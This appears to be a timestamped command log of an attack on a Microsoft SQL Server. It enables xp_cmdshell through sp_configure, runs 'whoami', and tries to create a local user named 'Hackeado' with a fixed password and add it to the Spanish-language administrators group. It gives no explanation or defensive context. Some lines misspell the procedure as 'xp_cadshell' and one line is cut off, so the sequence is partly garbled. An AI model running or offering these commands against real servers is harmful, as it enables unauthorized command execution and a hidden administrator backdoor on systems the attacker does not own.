EXEC sp_configure 'show advanced options',1 10:31 RECONFIGURE 10:31 EXEC sp_configure 'xp_cmdshell',1 10:32 EXEC master.dbo.xp_cmdshell ' 10:32 EXEC master.dbo.xp_cmdshell 'whoami' 10:37 EXEC master.dbo.xp_cadshell 'net users Hackeado Entrada2020! /add' 10:37 EXEC master.dbo.xp_cadshell 'net localgroup administradores Hackeado /add'